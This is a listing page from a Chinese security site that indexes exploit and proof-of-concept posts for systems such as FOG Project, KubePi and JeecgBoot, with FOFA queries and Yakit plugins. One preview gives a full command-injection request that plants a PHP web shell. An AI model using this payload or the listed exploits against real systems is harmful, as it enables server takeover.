最新发布第49页
fogproject系统接口export.php存在远程命令执行漏洞_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01075
KubePi存在JWT token验证绕过漏洞_秃兔安全
【通用】全新UI⾃助打印⼩程序系统 文件上传_秃兔安全

【通用】全新UI⾃助打印⼩程序系统 文件上传

fofayakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
010710
天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞_秃兔安全
【2025特殊通用】易宝OA getPosition sqli_秃兔安全

【2025特殊通用】易宝OA getPosition sqli

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29212个月前
010714
【2025特殊通用】JeecgBoot  getDataSourceByPage 信息泄露_秃兔安全

【2025特殊通用】JeecgBoot getDataSourceByPage 信息泄露

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer29212个月前
01076
锐捷EG350易网关管理系统存在信息泄露漏洞_秃兔安全
科荣 AIO 管理系统任意文件读取_秃兔安全

科荣 AIO 管理系统任意文件读取

import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
01068
【通用】万能门店小程序 onepic_uploade 任意文件上传漏洞_秃兔安全
金和OA jc6 clobfield SQL注入漏洞_秃兔安全
攻防演练 & 红蓝对抗 & 其他文库
红队文库
涵盖常规系统命令、常见工具命令、内网渗透命令、渗透测试常用命令、远程控制常用命令等;达五十万字
10篇文章更多文章
高级资源版块:签到即免费领积分